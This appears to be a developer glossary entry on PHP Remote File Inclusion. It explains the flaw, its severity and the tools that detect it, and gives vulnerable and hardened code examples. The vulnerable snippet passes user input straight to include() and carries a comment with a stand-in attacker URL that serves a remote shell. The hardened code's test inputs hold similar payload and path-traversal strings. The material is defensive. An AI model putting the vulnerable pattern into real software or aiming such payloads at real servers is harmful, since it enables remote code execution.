
Remote File Inclusion (RFI)

Tags: Security · CWE-98 · OWASP A3:2021 · CVSS 9.8 · PHP 5.0+ · Intermediate
DEBT score: d5/e3/b3/t7
d5 Detectability Operational debt — how invisible misuse is to your safety net

Closest to 'specialist tool catches it' (d5). The detection_hints list semgrep, lynis, and phpstan — all specialist/SAST tools. The pattern (user-controlled input in include/require paths, allow_url_include=On) is not caught by default linters but is detectable with these dedicated static analysis tools. Runtime exploitation may be silent in production without active scanning.

e3 Effort Remediation debt — work required to fix once spotted

Closest to 'simple parameterised fix' (e3). The quick_fix states: set allow_url_include=Off in php.ini, which is off by default since PHP 5.2 — a single config change. However, common_mistakes reveal additional work: replacing user-controlled paths in include/require calls, fixing path traversal filtering, and using realpath() for whitelist validation. This elevates the fix slightly beyond a one-liner to a small but focused remediation pattern within one component/config scope.

b3 Burden Structural debt — long-term weight of choosing wrong

Closest to 'localised tax' (b3). The vulnerability applies specifically to PHP web contexts where user input reaches include/require. Once allow_url_include is disabled and include paths are hardened, the burden is contained to the affected file inclusion logic rather than spreading across the entire codebase. It doesn't fundamentally reshape architecture.

t7 Trap Cognitive debt — how counter-intuitive correct behaviour is

Closest to 'serious trap' (t7). The misconception field states that developers believe allow_url_include=Off fully prevents file inclusion attacks, but it only prevents RFI — LFI remains possible and can itself lead to RCE via log poisoning or session file inclusion. This directly contradicts a reasonable developer assumption that disabling one setting closes the entire vulnerability class, making it a serious cognitive trap.


Also Known As

RFI; Remote File Inclusion; remote include

TL;DR

An attacker tricks include() or require() into loading a PHP file from an attacker-controlled remote URL, achieving code execution.

Explanation

RFI is enabled by allow_url_include=On (disabled by default since PHP 5.2) and user-controlled include paths. An attacker supplies a URL pointing to a remote PHP file they control — the server fetches and executes it with full server privileges. Even with allow_url_include=Off, LFI can escalate to code execution via log poisoning, PHAR injection, or /proc/self/environ. Prevention: always disable allow_url_include, never pass user input to include/require, use a whitelist of permitted file identifiers, and validate paths with realpath() against an allowed prefix.

Common Misconception

allow_url_include = Off fully prevents file inclusion attacks. It prevents remote URL inclusion but not local file inclusion (LFI) — and LFI can itself lead to RCE via log poisoning or PHP session file inclusion.

Why It Matters

Fetching a remote PHP file via include() gives the attacker full code execution; even local file inclusion can expose source code or log-poisoning chains.

Common Mistakes

  • Using user input directly in include(), require(), or include_once() paths.
  • Leaving allow_url_include = On in php.ini — this enables RFI entirely.
  • Path traversal filtering that misses double-encoded sequences like ..%2F.
  • Using a whitelist of partial filenames without verifying the full resolved path via realpath().

Code Examples

✗ Vulnerable
include($_GET['page'] . '.php'); // attacker passes http://evil.com/shell
✓ Fixed
$allowed = ['home', 'about', 'contact'];                            // closed allow-list of page identifiers
$requested = $_GET['page'] ?? 'home';                               // avoid an undefined-index notice
$page = in_array($requested, $allowed, true) ? $requested : 'home';  // strict comparison, no type juggling
include __DIR__ . '/pages/' . $page . '.php';                       // path built only from allow-listed values
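The realpath()-against-an-allowed-prefix validation that the Explanation and the Common Mistakes list call for, as an added example rather than the glossary's own code. The PageLoader class, the pages/ directory layout and the sample inputs are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the glossary's own code. Assumed layout: page templates
// live under <script dir>/pages/<name>.php and nothing else should be includable.
final class PageLoader
{
    private string $baseDir;

    public function __construct(string $baseDir)
    {
        // Fail closed if the php.ini hardening from the Quick Fix is missing.
        if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
            throw new RuntimeException('allow_url_include must be Off');
        }
        $real = realpath($baseDir);
        if ($real === false) {
            throw new RuntimeException("page directory not found: $baseDir");
        }
        $this->baseDir = $real . DIRECTORY_SEPARATOR;
    }

    // Returns the absolute file to include, or null when the request must be refused.
    public function resolve(string $page): ?string
    {
        // PHP already decoded $_GET once, so a double-encoded "..%252F" arrives as
        // "..%2F"; decode again so it is judged as "../" and rejected by the shape check.
        $name = rawurldecode($page);
        if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $name)) {
            return null;
        }
        // realpath() collapses "..", follows symlinks, returns false for missing files
        // and never resolves http:// or php:// wrappers; then pin the result under baseDir.
        $candidate = realpath($this->baseDir . $name . '.php');
        if ($candidate === false || strncmp($candidate, $this->baseDir, strlen($this->baseDir)) !== 0) {
            return null;
        }
        return $candidate;
    }
}

// Hardened replacement for include($_GET['page'] . '.php'); the inputs below are constructed.
$loader = new PageLoader(__DIR__ . '/pages');
foreach (['about', '../../../secret', '..%252Fsecret', 'http://attacker.example/shell'] as $input) {
    echo $input, ' => ', $loader->resolve($input) === null ? 'rejected' : 'ok', PHP_EOL;
}
$target = $loader->resolve($_GET['page'] ?? 'home');
include $target ?? __DIR__ . '/pages/home.php';
```

Only 'about' can pass, and only if pages/about.php actually exists; the three other constructed inputs are refused before any include() runs.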

Added 15 Mar 2026
Edited 22 Mar 2026
Dev Intel: Tools & Severity

Severity: Critical. Fix effort: Low.

Quick Fix
Set allow_url_include=Off in php.ini (it's off by default since PHP 5.2) — remote file inclusion is only possible if this setting is enabled, so disabling it prevents the entire class of attacks.

Applies To
PHP 5.0+ web

Detection Hints
allow_url_include=On in php.ini; include or require with user-controlled URL; including remote scripts.
Auto-detectable: Yes (semgrep, lynis, phpstan)
Related CWEs: CWE-98, CWE-829